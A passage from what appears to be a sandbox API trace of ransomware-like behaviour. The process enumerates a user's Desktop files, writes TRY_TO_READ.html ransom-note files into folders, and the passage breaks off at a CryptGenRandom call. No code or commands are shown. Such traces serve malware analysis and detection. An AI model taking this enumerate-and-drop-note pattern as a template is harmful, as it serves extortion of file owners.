hHeap=0x2e0000) returned 1 [0160.729] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x323f30 [0160.729] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x80) returned 0x3292c0 [0160.729] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x323f30 | out: hHeap=0x2e0000) returned 1 [0160.729] GetLastError () returned 0x5 [0160.729] FindNextFileW (in: hFindFile=0x35e2d8, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x384eefb0, ftCreationTime.dwHighDateTime=0x1d4d02d, ftLastAccessTime.dwLowDateTime=0xc5bcb860, ftLastAccessTime.dwHighDateTime=0x1d4cac3, ftLastWriteTime.dwLowDateTime=0xc5bcb860, ftLastWriteTime.dwHighDateTime=0x1d4cac3, nFileSizeHigh=0x0, nFileSizeLow=0xbcd3, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="brmFf-QyNVENevBqgwPI.jpg", cAlternateFileName="BRMFF-~1.JPG")) returned 1 [0160.729] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3292c0 | out: hHeap=0x2e0000) returned 1 [0160.729] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x323f30 [0160.729] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x80) returned 0x3292c0 [0160.729] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x323f30 | out: hHeap=0x2e0000) returned 1 [0160.729] GetLastError () returned 0x5 [0160.729] FindNextFileW (in: hFindFile=0x35e2d8, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4f8ff840, ftCreationTime.dwHighDateTime=0x1d4c957, ftLastAccessTime.dwLowDateTime=0x1d49a560, ftLastAccessTime.dwHighDateTime=0x1d4c6ab, ftLastWriteTime.dwLowDateTime=0x1d49a560, ftLastWriteTime.dwHighDateTime=0x1d4c6ab, nFileSizeHigh=0x0, nFileSizeLow=0x6070, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="cmpw6P2.avi", cAlternateFileName="")) returned 1 [0160.729] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3292c0 | out: hHeap=0x2e0000) returned 1 [0160.729] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x323f30 [0160.730] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x80) returned 0x3292c0 [0160.730] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x323f30 | out: hHeap=0x2e0000) returned 1 [0160.730] GetLastError () returned 0x5 [0160.730] FindNextFileW (in: hFindFile=0x35e2d8, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x56a6a280, ftCreationTime.dwHighDateTime=0x1d5956e, ftLastAccessTime.dwLowDateTime=0x56a6a280, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0x54dcdf00, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x2ae00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="csrhdp.exe", cAlternateFileName="")) returned 1 [0160.730] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3292c0 | out: hHeap=0x2e0000) returned 1 [0160.730] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x323f30 [0160.730] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x80) returned 0x3292c0 [0160.730] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x323f30 | out: hHeap=0x2e0000) returned 1 [0160.730] GetLastError () returned 0x5 [0160.730] FindNextFileW (in: hFindFile=0x35e2d8, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0160.730] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3292c0 | out: hHeap=0x2e0000) returned 1 [0160.730] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x323f30 [0160.730] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x80) returned 0x3292c0 [0160.730] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x323f30 | out: hHeap=0x2e0000) returned 1 [0160.730] GetLastError () returned 0x5 [0160.730] FindNextFileW (in: hFindFile=0x35e2d8, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x97574e60, ftCreationTime.dwHighDateTime=0x1d4ca76, ftLastAccessTime.dwLowDateTime=0xefb29f0, ftLastAccessTime.dwHighDateTime=0x1d4c8c9, ftLastWriteTime.dwLowDateTime=0xefb29f0, ftLastWriteTime.dwHighDateTime=0x1d4c8c9, nFileSizeHigh=0x0, nFileSizeLow=0x9c21, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="eNkZpblszxCN6V.mkv", cAlternateFileName="ENKZPB~1.MKV")) returned 1 [0160.730] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3292c0 | out: hHeap=0x2e0000) returned 1 [0160.730] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x323f30 [0160.730] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x80) returned 0x3292c0 [0160.730] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x323f30 | out: hHeap=0x2e0000) returned 1 [0160.730] GetLastError () returned 0x5 [0160.730] FindNextFileW (in: hFindFile=0x35e2d8, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2388db0, ftCreationTime.dwHighDateTime=0x1d4c97e, ftLastAccessTime.dwLowDateTime=0xc5786140, ftLastAccessTime.dwHighDateTime=0x1d4d367, ftLastWriteTime.dwLowDateTime=0xc5786140, ftLastWriteTime.dwHighDateTime=0x1d4d367, nFileSizeHigh=0x0, nFileSizeLow=0x15348, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="EsX9GsMCQ1XL.bmp", cAlternateFileName="ESX9GS~1.BMP")) returned 1 [0160.730] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3292c0 | out: hHeap=0x2e0000) returned 1 [0160.730] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x323f30 [0160.730] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x80) returned 0x3292c0 [0160.730] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x323f30 | out: hHeap=0x2e0000) returned 1 [0160.730] GetLastError () returned 0x5 [0160.730] FindNextFileW (in: hFindFile=0x35e2d8, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe0ac3e30, ftCreationTime.dwHighDateTime=0x1d4c707, ftLastAccessTime.dwLowDateTime=0x1a4f50a0, ftLastAccessTime.dwHighDateTime=0x1d4d41e, ftLastWriteTime.dwLowDateTime=0x1a4f50a0, ftLastWriteTime.dwHighDateTime=0x1d4d41e, nFileSizeHigh=0x0, nFileSizeLow=0xa055, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="GfeSaRPAgQ3rLXbm.swf", cAlternateFileName="GFESAR~1.SWF")) returned 1 [0160.730] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3292c0 | out: hHeap=0x2e0000) returned 1 [0160.731] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x323f30 [0160.731] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x80) returned 0x3292c0 [0160.731] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x323f30 | out: hHeap=0x2e0000) returned 1 [0160.731] GetLastError () returned 0x5 [0160.731] FindNextFileW (in: hFindFile=0x35e2d8, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x86cf2510, ftCreationTime.dwHighDateTime=0x1d4c58d, ftLastAccessTime.dwLowDateTime=0xc84b5c10, ftLastAccessTime.dwHighDateTime=0x1d4d493, ftLastWriteTime.dwLowDateTime=0xc84b5c10, ftLastWriteTime.dwHighDateTime=0x1d4d493, nFileSizeHigh=0x0, nFileSizeLow=0x77df, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="hbDDqm8GEo0-YkOxuo.mkv", cAlternateFileName="HBDDQM~1.MKV")) returned 1 [0160.731] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3292c0 | out: hHeap=0x2e0000) returned 1 [0160.731] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x323f30 [0160.731] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x80) returned 0x3292c0 [0160.731] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x323f30 | out: hHeap=0x2e0000) returned 1 [0160.731] GetLastError () returned 0x5 [0160.731] FindNextFileW (in: hFindFile=0x35e2d8, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x302940d0, ftCreationTime.dwHighDateTime=0x1d4c581, ftLastAccessTime.dwLowDateTime=0xb89d2c70, ftLastAccessTime.dwHighDateTime=0x1d4c701, ftLastWriteTime.dwLowDateTime=0xb89d2c70, ftLastWriteTime.dwHighDateTime=0x1d4c701, nFileSizeHigh=0x0, nFileSizeLow=0x6894, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ihxilaKj4yJyjxBiEwMg.swf", cAlternateFileName="IHXILA~1.SWF")) returned 1 [0160.731] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3292c0 | out: hHeap=0x2e0000) returned 1 [0160.731] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x323f30 [0160.731] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x80) returned 0x3292c0 [0160.731] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x323f30 | out: hHeap=0x2e0000) returned 1 [0160.731] GetLastError () returned 0x5 [0160.731] FindNextFileW (in: hFindFile=0x35e2d8, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x84f30760, ftCreationTime.dwHighDateTime=0x1d4c985, ftLastAccessTime.dwLowDateTime=0x77eb3bf0, ftLastAccessTime.dwHighDateTime=0x1d4c6f1, ftLastWriteTime.dwLowDateTime=0x77eb3bf0, ftLastWriteTime.dwHighDateTime=0x1d4c6f1, nFileSizeHigh=0x0, nFileSizeLow=0xb499, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="KSXbXK_kbK_G83ifB4fv.wav", cAlternateFileName="KSXBXK~1.WAV")) returned 1 [0160.731] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3292c0 | out: hHeap=0x2e0000) returned 1 [0160.731] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x323f30 [0160.731] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x80) returned 0x3292c0 [0160.731] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x323f30 | out: hHeap=0x2e0000) returned 1 [0160.731] GetLastError () returned 0x5 [0160.731] FindNextFileW (in: hFindFile=0x35e2d8, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf3b039d0, ftCreationTime.dwHighDateTime=0x1d4d4ec, ftLastAccessTime.dwLowDateTime=0x33611da0, ftLastAccessTime.dwHighDateTime=0x1d4d192, ftLastWriteTime.dwLowDateTime=0x33611da0, ftLastWriteTime.dwHighDateTime=0x1d4d192, nFileSizeHigh=0x0, nFileSizeLow=0x465a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="LQrK2DOgzbi3.mkv", cAlternateFileName="LQRK2D~1.MKV")) returned 1 [0160.731] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3292c0 | out: hHeap=0x2e0000) returned 1 [0160.731] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x323f30 [0160.731] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x80) returned 0x3292c0 [0160.731] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x323f30 | out: hHeap=0x2e0000) returned 1 [0160.731] GetLastError () returned 0x5 [0160.731] FindNextFileW (in: hFindFile=0x35e2d8, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7aa48960, ftCreationTime.dwHighDateTime=0x1d4ce61, ftLastAccessTime.dwLowDateTime=0xfbe62b0, ftLastAccessTime.dwHighDateTime=0x1d4d1b8, ftLastWriteTime.dwLowDateTime=0xfbe62b0, ftLastWriteTime.dwHighDateTime=0x1d4d1b8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MUzt 2daZ", cAlternateFileName="MUZT2D~1")) returned 1 [0160.731] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3292c0 | out: hHeap=0x2e0000) returned 1 [0160.732] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x323f30 [0160.732] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x80) returned 0x3292c0 [0160.732] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x323f30 | out: hHeap=0x2e0000) returned 1 [0160.732] GetLastError () returned 0x5 [0160.732] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\MUzt 2daZ\\TRY_TO_READ.html" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\muzt 2daz\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x398 [0160.734] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x31fba8 | out: hHeap=0x2e0000) returned 1 [0160.735] WriteFile (in: hFile=0x398, lpBuffer=0x348ed8*, nNumberOfBytesToWrite=0x548, lpNumberOfBytesWritten=0x2acfb00, lpOverlapped=0x0 | out: lpBuffer=0x348ed8*, lpNumberOfBytesWritten=0x2acfb00*=0x548, lpOverlapped=0x0) returned 1 [0160.735] WriteFile (in: hFile=0x398, lpBuffer=0x45a1f8*, nNumberOfBytesToWrite=0xf28, lpNumberOfBytesWritten=0x2acfb00, lpOverlapped=0x0 | out: lpBuffer=0x45a1f8*, lpNumberOfBytesWritten=0x2acfb00*=0xf28, lpOverlapped=0x0) returned 1 [0160.736] WriteFile (in: hFile=0x398, lpBuffer=0x4428d0*, nNumberOfBytesToWrite=0x4b, lpNumberOfBytesWritten=0x2acfb00, lpOverlapped=0x0 | out: lpBuffer=0x4428d0*, lpNumberOfBytesWritten=0x2acfb00*=0x4b, lpOverlapped=0x0) returned 1 [0160.736] CloseHandle (hObject=0x398) returned 1 [0160.736] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x31fae0 | out: hHeap=0x2e0000) returned 1 [0160.736] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x383db0 | out: hHeap=0x2e0000) returned 1 [0160.736] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x383d90 | out: hHeap=0x2e0000) returned 1 [0160.736] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x336dd8 | out: hHeap=0x2e0000) returned 1 [0160.736] FindNextFileW (in: hFindFile=0x35e2d8, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2fae3080, ftCreationTime.dwHighDateTime=0x1d4c599, ftLastAccessTime.dwLowDateTime=0x6f1a2480, ftLastAccessTime.dwHighDateTime=0x1d4d4f4, ftLastWriteTime.dwLowDateTime=0x6f1a2480, ftLastWriteTime.dwHighDateTime=0x1d4d4f4, nFileSizeHigh=0x0, nFileSizeLow=0x9618, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Q9qoLmUohJf4.mp3", cAlternateFileName="Q9QOLM~1.MP3")) returned 1 [0160.736] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3292c0 | out: hHeap=0x2e0000) returned 1 [0160.736] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x323f30 [0160.736] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x80) returned 0x3292c0 [0160.736] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x323f30 | out: hHeap=0x2e0000) returned 1 [0160.736] GetLastError () returned 0x0 [0160.736] FindNextFileW (in: hFindFile=0x35e2d8, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x79682510, ftCreationTime.dwHighDateTime=0x1d4c9bc, ftLastAccessTime.dwLowDateTime=0xfaeb6280, ftLastAccessTime.dwHighDateTime=0x1d4cb1c, ftLastWriteTime.dwLowDateTime=0xfaeb6280, ftLastWriteTime.dwHighDateTime=0x1d4cb1c, nFileSizeHigh=0x0, nFileSizeLow=0x9535, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="qTp aPR6Wpwl.bmp", cAlternateFileName="QTPAPR~1.BMP")) returned 1 [0160.736] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3292c0 | out: hHeap=0x2e0000) returned 1 [0160.736] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x323f30 [0160.736] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x80) returned 0x3292c0 [0160.736] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x323f30 | out: hHeap=0x2e0000) returned 1 [0160.736] GetLastError () returned 0x0 [0160.736] FindNextFileW (in: hFindFile=0x35e2d8, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x978366d0, ftCreationTime.dwHighDateTime=0x1d5956e, ftLastAccessTime.dwLowDateTime=0x978366d0, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0x978366d0, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x14bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 1 [0160.736] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3292c0 | out: hHeap=0x2e0000) returned 1 [0160.736] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x323f30 [0160.736] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x80) returned 0x3292c0 [0160.736] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x323f30 | out: hHeap=0x2e0000) returned 1 [0160.737] GetLastError () returned 0x0 [0160.737] FindNextFileW (in: hFindFile=0x35e2d8, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x84e3600, ftCreationTime.dwHighDateTime=0x1d4d171, ftLastAccessTime.dwLowDateTime=0x5aa149a0, ftLastAccessTime.dwHighDateTime=0x1d4cc95, ftLastWriteTime.dwLowDateTime=0x5aa149a0, ftLastWriteTime.dwHighDateTime=0x1d4cc95, nFileSizeHigh=0x0, nFileSizeLow=0x917d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="uHLEY_Gtgovhr5ztxC4-.gif", cAlternateFileName="UHLEY_~1.GIF")) returned 1 [0160.737] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3292c0 | out: hHeap=0x2e0000) returned 1 [0160.737] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x323f30 [0160.737] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x80) returned 0x3292c0 [0160.737] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x323f30 | out: hHeap=0x2e0000) returned 1 [0160.737] GetLastError () returned 0x0 [0160.737] FindNextFileW (in: hFindFile=0x35e2d8, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x382c7300, ftCreationTime.dwHighDateTime=0x1d4c5fa, ftLastAccessTime.dwLowDateTime=0x51b0da10, ftLastAccessTime.dwHighDateTime=0x1d4d076, ftLastWriteTime.dwLowDateTime=0x51b0da10, ftLastWriteTime.dwHighDateTime=0x1d4d076, nFileSizeHigh=0x0, nFileSizeLow=0xcd79, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="vqjVrbgFol.wav", cAlternateFileName="VQJVRB~1.WAV")) returned 1 [0160.737] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3292c0 | out: hHeap=0x2e0000) returned 1 [0160.737] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x323f30 [0160.737] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x80) returned 0x3292c0 [0160.737] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x323f30 | out: hHeap=0x2e0000) returned 1 [0160.737] GetLastError () returned 0x0 [0160.737] FindNextFileW (in: hFindFile=0x35e2d8, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4a3eab60, ftCreationTime.dwHighDateTime=0x1d4c688, ftLastAccessTime.dwLowDateTime=0x3ef865e0, ftLastAccessTime.dwHighDateTime=0x1d4c640, ftLastWriteTime.dwLowDateTime=0x3ef865e0, ftLastWriteTime.dwHighDateTime=0x1d4c640, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="WUnNtGHKBBs", cAlternateFileName="WUNNTG~1")) returned 1 [0160.737] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3292c0 | out: hHeap=0x2e0000) returned 1 [0160.737] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x323f30 [0160.737] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x80) returned 0x3292c0 [0160.737] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x323f30 | out: hHeap=0x2e0000) returned 1 [0160.737] GetLastError () returned 0x0 [0160.737] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\WUnNtGHKBBs\\TRY_TO_READ.html" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\wunntghkbbs\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x398 [0160.739] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x31fba8 | out: hHeap=0x2e0000) returned 1 [0160.739] WriteFile (in: hFile=0x398, lpBuffer=0x348ed8*, nNumberOfBytesToWrite=0x548, lpNumberOfBytesWritten=0x2acfb00, lpOverlapped=0x0 | out: lpBuffer=0x348ed8*, lpNumberOfBytesWritten=0x2acfb00*=0x548, lpOverlapped=0x0) returned 1 [0160.740] WriteFile (in: hFile=0x398, lpBuffer=0x45a1f8*, nNumberOfBytesToWrite=0xf28, lpNumberOfBytesWritten=0x2acfb00, lpOverlapped=0x0 | out: lpBuffer=0x45a1f8*, lpNumberOfBytesWritten=0x2acfb00*=0xf28, lpOverlapped=0x0) returned 1 [0160.740] WriteFile (in: hFile=0x398, lpBuffer=0x4428d0*, nNumberOfBytesToWrite=0x4b, lpNumberOfBytesWritten=0x2acfb00, lpOverlapped=0x0 | out: lpBuffer=0x4428d0*, lpNumberOfBytesWritten=0x2acfb00*=0x4b, lpOverlapped=0x0) returned 1 [0160.740] CloseHandle (hObject=0x398) returned 1 [0160.740] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x31fae0 | out: hHeap=0x2e0000) returned 1 [0160.740] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x383db0 | out: hHeap=0x2e0000) returned 1 [0160.741] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x383d90 | out: hHeap=0x2e0000) returned 1 [0160.741] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3a9518 | out: hHeap=0x2e0000) returned 1 [0160.741] FindNextFileW (in: hFindFile=0x35e2d8, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd242c420, ftCreationTime.dwHighDateTime=0x1d4d4bf, ftLastAccessTime.dwLowDateTime=0xae0538b0, ftLastAccessTime.dwHighDateTime=0x1d4c8c4, ftLastWriteTime.dwLowDateTime=0xae0538b0, ftLastWriteTime.dwHighDateTime=0x1d4c8c4, nFileSizeHigh=0x0, nFileSizeLow=0x322f, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Yw_NDNwDWV1e2l.wav", cAlternateFileName="YW_NDN~1.WAV")) returned 1 [0160.741] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3292c0 | out: hHeap=0x2e0000) returned 1 [0160.741] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x323f30 [0160.741] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x80) returned 0x3292c0 [0160.741] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x323f30 | out: hHeap=0x2e0000) returned 1 [0160.741] GetLastError () returned 0x0 [0160.741] FindNextFileW (in: hFindFile=0x35e2d8, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2d6a50, ftCreationTime.dwHighDateTime=0x1d4d314, ftLastAccessTime.dwLowDateTime=0x7a0b9d0, ftLastAccessTime.dwHighDateTime=0x1d4cb90, ftLastWriteTime.dwLowDateTime=0x7a0b9d0, ftLastWriteTime.dwHighDateTime=0x1d4cb90, nFileSizeHigh=0x0, nFileSizeLow=0xd856, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ZxJwLmffZ5ibXO_Ztslu.gif", cAlternateFileName="ZXJWLM~1.GIF")) returned 1 [0160.741] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3292c0 | out: hHeap=0x2e0000) returned 1 [0160.741] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x323f30 [0160.741] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x80) returned 0x3292c0 [0160.741] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x323f30 | out: hHeap=0x2e0000) returned 1 [0160.741] GetLastError () returned 0x0 [0160.741] FindNextFileW (in: hFindFile=0x35e2d8, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2d6a50, ftCreationTime.dwHighDateTime=0x1d4d314, ftLastAccessTime.dwLowDateTime=0x7a0b9d0, ftLastAccessTime.dwHighDateTime=0x1d4cb90, ftLastWriteTime.dwLowDateTime=0x7a0b9d0, ftLastWriteTime.dwHighDateTime=0x1d4cb90, nFileSizeHigh=0x0, nFileSizeLow=0xd856, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ZxJwLmffZ5ibXO_Ztslu.gif", cAlternateFileName="ZXJWLM~1.GIF")) returned 0 [0160.741] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x80) returned 0x328ac8 [0160.741] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x100) returned 0x363948 [0160.741] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x8) returned 0x383d90 [0160.741] CryptGenRandom (in: hProv=0x3289b8, 